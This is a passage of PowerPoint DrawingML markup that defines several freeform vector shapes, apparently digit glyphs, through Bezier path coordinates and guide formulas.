                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="21"/>
                    <a:pt x="174" y="43"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="105"/>
                    <a:pt x="151" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="132"/>
                    <a:pt x="120" y="133"/>
                    <a:pt x="100" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="136"/>
                    <a:pt x="68" y="136"/>
                    <a:pt x="68" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="157"/>
                    <a:pt x="77" y="157"/>
                    <a:pt x="83" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="157"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="157"/>
                    <a:pt x="189" y="194"/>
                    <a:pt x="189" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="260"/>
                    <a:pt x="159" y="295"/>
                    <a:pt x="109" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="295"/>
                    <a:pt x="45" y="288"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="36" y="252"/>
                    <a:pt x="36" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="233"/>
                    <a:pt x="0" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="289"/>
                    <a:pt x="49" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="316"/>
                    <a:pt x="215" y="272"/>
                    <a:pt x="215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6" name="Freeform 1192">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200778C9-5E41-4F81-BA1D-F5BA315E1A65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207250" y="1560513"/>
              <a:ext cx="74613" cy="119063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7" name="Freeform 1193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D731FA34-1AE9-4DD1-8036-8906AC5270DE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339012" y="1658938"/>
              <a:ext cx="20638" cy="20638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8" name="Freeform 1194">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F370D182-A869-48B9-9B85-C9333F12918D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7419975" y="1558925"/>
              <a:ext cx="61913" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 164 w 164"/>
                <a:gd name="T1" fmla="*/ 300 h 311"/>
                <a:gd name="T2" fmla="*/ 148 w 164"/>
                <a:gd name="T3" fmla="*/ 290 h 311"/>
                <a:gd name="T4" fmla="*/ 96 w 164"/>
                <a:gd name="T5" fmla="*/ 290 h 311"/>
                <a:gd name="T6" fmla="*/ 96 w 164"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 86 w 164"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 77 w 164"/>
                <a:gd name="T11" fmla="*/ 6 h 311"/>
                <a:gd name="T12" fmla="*/ 9 w 164"/>
                <a:gd name="T13" fmla="*/ 64 h 311"/>
                <a:gd name="T14" fmla="*/ 0 w 164"/>
                <a:gd name="T15" fmla="*/ 74 h 311"/>
                <a:gd name="T16" fmla="*/ 12 w 164"/>
                <a:gd name="T17" fmla="*/ 84 h 311"/>
                <a:gd name="T18" fmla="*/ 71 w 164"/>
                <a:gd name="T19" fmla="*/ 55 h 311"/>
                <a:gd name="T20" fmla="*/ 71 w 164"/>
                <a:gd name="T21" fmla="*/ 290 h 311"/>
                <a:gd name="T22" fmla="*/ 19 w 164"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 3 w 164"/>
                <a:gd name="T25" fmla="*/ 300 h 311"/>
                <a:gd name="T26" fmla="*/ 19 w 164"/>
                <a:gd name="T27" fmla="*/ 311 h 311"/>
                <a:gd name="T28" fmla="*/ 148 w 164"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 164 w 164"/>
                <a:gd name="T31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1">
                  <a:moveTo>
                    <a:pt x="164" y="300"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="290"/>
                    <a:pt x="154" y="290"/>
                    <a:pt x="148" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="290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1" y="0"/>
                    <a:pt x="78" y="3"/>
                    <a:pt x="77" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="56"/>
                    <a:pt x="25" y="62"/>
                    <a:pt x="9" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="65"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83"/>
                    <a:pt x="7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90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="290"/>
                    <a:pt x="3" y="290"/>
                    <a:pt x="3" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="311"/>
                    <a:pt x="13" y="311"/>
                    <a:pt x="19" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="311"/>
                    <a:pt x="164" y="311"/>
                    <a:pt x="164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9" name="Freeform 1195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6F5DE3-19D6-4420-8915-74893B993D12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7519987" y="1558925"/>
              <a:ext cx="61913" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 163 w 163"/>
                <a:gd name="T1" fmla="*/ 300 h 311"/>
                <a:gd name="T2" fmla="*/ 148 w 163"/>
                <a:gd name="T3" fmla="*/ 290 h 311"/>
                <a:gd name="T4" fmla="*/ 96 w 163"/>
                <a:gd name="T5" fmla="*/ 290 h 311"/>
                <a:gd name="T6" fmla="*/ 96 w 163"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 86 w 163"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 76 w 163"/>
                <a:gd name="T11" fmla="*/ 6 h 311"/>
                <a:gd name="T12" fmla="*/ 9 w 163"/>
                <a:gd name="T13" fmla="*/ 64 h 311"/>
                <a:gd name="T14" fmla="*/ 0 w 163"/>
                <a:gd name="T15" fmla="*/ 74 h 311"/>
                <a:gd name="T16" fmla="*/ 12 w 163"/>
                <a:gd name="T17" fmla="*/ 84 h 311"/>
                <a:gd name="T18" fmla="*/ 71 w 163"/>
                <a:gd name="T19" fmla="*/ 55 h 311"/>
                <a:gd name="T20" fmla="*/ 71 w 163"/>
                <a:gd name="T21" fmla="*/ 290 h 311"/>
                <a:gd name="T22" fmla="*/ 18 w 163"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 3 w 163"/>
                <a:gd name="T25" fmla="*/ 300 h 311"/>
                <a:gd name="T26" fmla="*/ 18 w 163"/>
                <a:gd name="T27" fmla="*/ 311 h 311"/>
                <a:gd name="T28" fmla="*/ 148 w 163"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 163 w 163"/>
                <a:gd name="T31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1">
                  <a:moveTo>
                    <a:pt x="163" y="300"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="290"/>
                    <a:pt x="154" y="290"/>
                    <a:pt x="148" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="290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3"/>
                    <a:pt x="76" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="56"/>
                    <a:pt x="25" y="62"/>
                    <a:pt x="9" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="65"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83"/>
                    <a:pt x="6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90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="290"/>
                    <a:pt x="3" y="290"/>
                    <a:pt x="3" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="311"/>
                    <a:pt x="13" y="311"/>
                    <a:pt x="18" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="311"/>
                    <a:pt x="163" y="311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0" name="Freeform 1196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B20EDAFB-1E92-491F-82DD-684A6C87DC76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7608887" y="1558925"/>
              <a:ext cx="79375" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 206 w 206"/>
                <a:gd name="T1" fmla="*/ 295 h 311"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 281 h 311"/>
                <a:gd name="T4" fmla="*/ 194 w 206"/>
                <a:gd name="T5" fmla="*/ 265 h 311"/>
                <a:gd name="T6" fmla="*/ 181 w 206"/>
                <a:gd name="T7" fmla="*/ 290 h 311"/>
                <a:gd name="T8" fmla="*/ 39 w 206"/>
                <a:gd name="T9" fmla="*/ 290 h 311"/>
                <a:gd name="T10" fmla="*/ 161 w 206"/>
                <a:gd name="T11" fmla="*/ 186 h 311"/>
                <a:gd name="T12" fmla="*/ 206 w 206"/>
                <a:gd name="T13" fmla="*/ 96 h 311"/>
                <a:gd name="T14" fmla="*/ 97 w 206"/>
                <a:gd name="T15" fmla="*/ 0 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 206"/>
                <a:gd name="T17" fmla="*/ 81 h 311"/>
                <a:gd name="T18" fmla="*/ 18 w 206"/>
                <a:gd name="T19" fmla="*/ 101 h 311"/>
                <a:gd name="T20" fmla="*/ 36 w 206"/>
                <a:gd name="T21" fmla="*/ 83 h 311"/>
                <a:gd name="T22" fmla="*/ 27 w 206"/>
                <a:gd name="T23" fmla="*/ 68 h 311"/>
                <a:gd name="T24" fmla="*/ 94 w 206"/>
                <a:gd name="T25" fmla="*/ 21 h 311"/>
                <a:gd name="T26" fmla="*/ 181 w 206"/>
                <a:gd name="T27" fmla="*/ 96 h 311"/>
                <a:gd name="T28" fmla="*/ 120 w 206"/>
                <a:gd name="T29" fmla="*/ 194 h 311"/>
                <a:gd name="T30" fmla="*/ 6 w 206"/>
                <a:gd name="T31" fmla="*/ 290 h 311"/>
                <a:gd name="T32" fmla="*/ 0 w 206"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 16 w 206"/>
                <a:gd name="T35" fmla="*/ 311 h 311"/>
                <a:gd name="T36" fmla="*/ 191 w 206"/>
                <a:gd name="T37" fmla="*/ 311 h 311"/>
                <a:gd name="T38" fmla="*/ 206 w 206"/>
                <a:gd name="T39" fmla="*/ 29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311">
                  <a:moveTo>
                    <a:pt x="206" y="295"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="206" y="281"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="274"/>
                    <a:pt x="206" y="265"/>
                    <a:pt x="194" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="265"/>
                    <a:pt x="181" y="273"/>
                    <a:pt x="181" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="254"/>
                    <a:pt x="130" y="215"/>
                    <a:pt x="161" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="160"/>
                    <a:pt x="206" y="131"/>
                    <a:pt x="206" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="37"/>
                    <a:pt x="156" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="96"/>
                    <a:pt x="11" y="101"/>
                    <a:pt x="18" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="101"/>
                    <a:pt x="36" y="94"/>
                    <a:pt x="36" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="78"/>
                    <a:pt x="34" y="73"/>
                    <a:pt x="27" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="39"/>
                    <a:pt x="63" y="21"/>
                    <a:pt x="94" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="21"/>
                    <a:pt x="181" y="47"/>
                    <a:pt x="181" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="133"/>
                    <a:pt x="155" y="164"/>
                    <a:pt x="120" y="194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="293"/>
                    <a:pt x="0" y="295"/>
                    <a:pt x="0" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="311"/>
                    <a:pt x="10" y="311"/>
                    <a:pt x="16" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="311"/>
                    <a:pt x="206" y="307"/>
                    <a:pt x="206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1" name="Freeform 1197">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FEC326A-519C-4877-9B87-CDE47F7105C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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7708900" y="1558925"/>
              <a:ext cx="79375" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 207"/>
                <a:gd name="T1" fmla="*/ 295 h 311"/>
                <a:gd name="T2" fmla="*/ 207 w 207"/>
                <a:gd name="T3" fmla="*/ 281 h 311"/>
                <a:gd name="T4" fmla="*/ 194 w 207"/>
                <a:gd name="T5" fmla="*/ 265 h 311"/>
                <a:gd name="T6" fmla="*/ 181 w 207"/>
                <a:gd name="T7" fmla="*/ 290 h 311"/>
                <a:gd name="T8" fmla="*/ 40 w 207"/>
                <a:gd name="T9" fmla="*/ 290 h 311"/>
                <a:gd name="T10" fmla="*/ 162 w 207"/>
                <a:gd name="T11" fmla="*/ 186 h 311"/>
                <a:gd name="T12" fmla="*/ 207 w 207"/>
                <a:gd name="T13" fmla="*/ 96 h 311"/>
                <a:gd name="T14" fmla="*/ 97 w 207"/>
                <a:gd name="T15" fmla="*/ 0 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 207"/>
                <a:gd name="T17" fmla="*/ 81 h 311"/>
                <a:gd name="T18" fmla="*/ 18 w 207"/>
                <a:gd name="T19" fmla="*/ 101 h 311"/>
                <a:gd name="T20" fmla="*/ 36 w 207"/>
                <a:gd name="T21" fmla="*/ 83 h 311"/>
                <a:gd name="T22" fmla="*/ 28 w 207"/>
                <a:gd name="T23" fmla="*/ 68 h 311"/>
                <a:gd name="T24" fmla="*/ 94 w 207"/>
                <a:gd name="T25" fmla="*/ 21 h 311"/>
                <a:gd name="T26" fmla="*/ 181 w 207"/>
                <a:gd name="T27" fmla="*/ 96 h 311"/>
                <a:gd name="T28" fmla="*/ 120 w 207"/>
                <a:gd name="T29" fmla="*/ 194 h 311"/>
                <a:gd name="T30" fmla="*/ 6 w 207"/>
                <a:gd name="T31" fmla="*/ 290 h 311"/>
                <a:gd name="T32" fmla="*/ 0 w 207"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 16 w 207"/>
                <a:gd name="T35" fmla="*/ 311 h 311"/>
                <a:gd name="T36" fmla="*/ 191 w 207"/>
                <a:gd name="T37" fmla="*/ 311 h 311"/>
                <a:gd name="T38" fmla="*/ 207 w 207"/>
                <a:gd name="T39" fmla="*/ 29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1">
                  <a:moveTo>
                    <a:pt x="207" y="295"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207" y="281"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="274"/>
                    <a:pt x="207" y="265"/>
                    <a:pt x="194" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="265"/>
                    <a:pt x="181" y="273"/>
                    <a:pt x="181" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="40" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="254"/>
                    <a:pt x="130" y="215"/>
                    <a:pt x="162" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="160"/>
                    <a:pt x="207" y="131"/>
                    <a:pt x="207" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="37"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="96"/>
                    <a:pt x="12" y="101"/>
                    <a:pt x="18" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="101"/>
                    <a:pt x="36" y="94"/>
                    <a:pt x="36" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="78"/>
                    <a:pt x="34" y="73"/>
                    <a:pt x="28" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="39"/>
                    <a:pt x="64" y="21"/>
                    <a:pt x="94" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="21"/>
                    <a:pt x="181" y="47"/>
                    <a:pt x="181" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="133"/>
                    <a:pt x="155" y="164"/>
                    <a:pt x="120" y="194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="293"/>
                    <a:pt x="0" y="295"/>
                    <a:pt x="0" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="311"/>
                    <a:pt x="10" y="311"/>
                    <a:pt x="16" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="311"/>
                    <a:pt x="207" y="307"/>
                    <a:pt x="207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2" name="Freeform 1198">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26572E52-2D2D-496C-BA12-41832EC28AE1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7808912" y="1558925"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 151 w 214"/>
                <a:gd name="T3" fmla="*/ 145 h 316"/>
                <a:gd name="T4" fmla="*/ 199 w 214"/>
                <a:gd name="T5" fmla="*/ 68 h 316"/>
                <a:gd name="T6" fmla="*/ 108 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 15 w 214"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 33 w 214"/>
                <a:gd name="T11" fmla="*/ 75 h 316"/>
                <a:gd name="T12" fmla="*/ 50 w 214"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 44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1 w 214"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 100 w 214"/>
                <a:gd name="T23" fmla="*/ 134 h 316"/>
                <a:gd name="T24" fmla="*/ 67 w 214"/>
                <a:gd name="T25" fmla="*/ 146 h 316"/>
                <a:gd name="T26" fmla="*/ 83 w 214"/>
                <a:gd name="T27" fmla="*/ 157 h 316"/>
                <a:gd name="T28" fmla="*/ 107 w 214"/>
                <a:gd name="T29" fmla="*/ 157 h 316"/>
                <a:gd name="T30" fmla="*/ 189 w 214"/>
                <a:gd name="T31" fmla="*/ 226 h 316"/>
                <a:gd name="T32" fmla="*/ 108 w 214"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 28 w 214"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 35 w 214"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 18 w 214"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 214"/>
                <a:gd name="T41" fmla="*/ 246 h 316"/>
                <a:gd name="T42" fmla="*/ 108 w 214"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 214 w 214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91"/>
                    <a:pt x="191" y="163"/>
                    <a:pt x="151" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="122"/>
                    <a:pt x="199" y="94"/>
                    <a:pt x="199" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="32"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="22"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="69"/>
                    <a:pt x="25" y="75"/>
                    <a:pt x="33" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="75"/>
                    <a:pt x="50" y="68"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="51"/>
                    <a:pt x="48" y="47"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="103" y="21"/>
                    <a:pt x="108" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="21"/>
                    <a:pt x="174" y="43"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="105"/>
                    <a:pt x="151" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="132"/>
                    <a:pt x="120" y="133"/>
                    <a:pt x="100" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="136"/>
                    <a:pt x="67" y="136"/>
                    <a:pt x="67" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="157"/>
                    <a:pt x="77" y="157"/>
                    <a:pt x="83" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="157"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="157"/>
                    <a:pt x="189" y="194"/>
                    <a:pt x="189" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="260"/>
                    <a:pt x="159" y="295"/>
                    <a:pt x="108" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="295"/>
                    <a:pt x="44" y="288"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="35" y="252"/>
                    <a:pt x="35" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="233"/>
                    <a:pt x="0" y="246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2"/>
                    <a:pt x="214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3" name="Freeform 1199">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24308534-F826-4E72-9B99-D5301C056D9F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7908925" y="1558925"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 215"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 151 w 215"/>
                <a:gd name="T3" fmla="*/ 145 h 316"/>
                <a:gd name="T4" fmla="*/ 200 w 215"/>
                <a:gd name="T5" fmla="*/ 68 h 316"/>
                <a:gd name="T6" fmla="*/ 108 w 215"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 15 w 215"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 33 w 215"/>
                <a:gd name="T11" fmla="*/ 75 h 316"/>
                <a:gd name="T12" fmla="*/ 51 w 215"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 44 w 215"/>
                <a:gd name="T15" fmla="*/ 42 h 316"/>
                <a:gd name="T16" fmla="*/ 109 w 215"/>
                <a:gd name="T17" fmla="*/ 21 h 316"/>
                <a:gd name="T18" fmla="*/ 174 w 215"/>
                <a:gd name="T19" fmla="*/ 68 h 316"/>
                <a:gd name="T20" fmla="*/ 151 w 215"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 100 w 215"/>
                <a:gd name="T23" fmla="*/ 134 h 316"/>
                <a:gd name="T24" fmla="*/ 68 w 215"/>
                <a:gd name="T25" fmla="*/ 146 h 316"/>
                <a:gd name="T26" fmla="*/ 83 w 215"/>
                <a:gd name="T27" fmla="*/ 157 h 316"/>
                <a:gd name="T28" fmla="*/ 107 w 215"/>
                <a:gd name="T29" fmla="*/ 157 h 316"/>
                <a:gd name="T30" fmla="*/ 189 w 215"/>
                <a:gd name="T31" fmla="*/ 226 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 215"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 28 w 215"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 36 w 215"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 18 w 215"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 215"/>
                <a:gd name="T41" fmla="*/ 246 h 316"/>
                <a:gd name="T42" fmla="*/ 109 w 215"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 215 w 215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316">
                  <a:moveTo>
                    <a:pt x="215" y="226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="191"/>
                    <a:pt x="192" y="163"/>
                    <a:pt x="151" y="145"/>
                  </a:cubicBezTo>
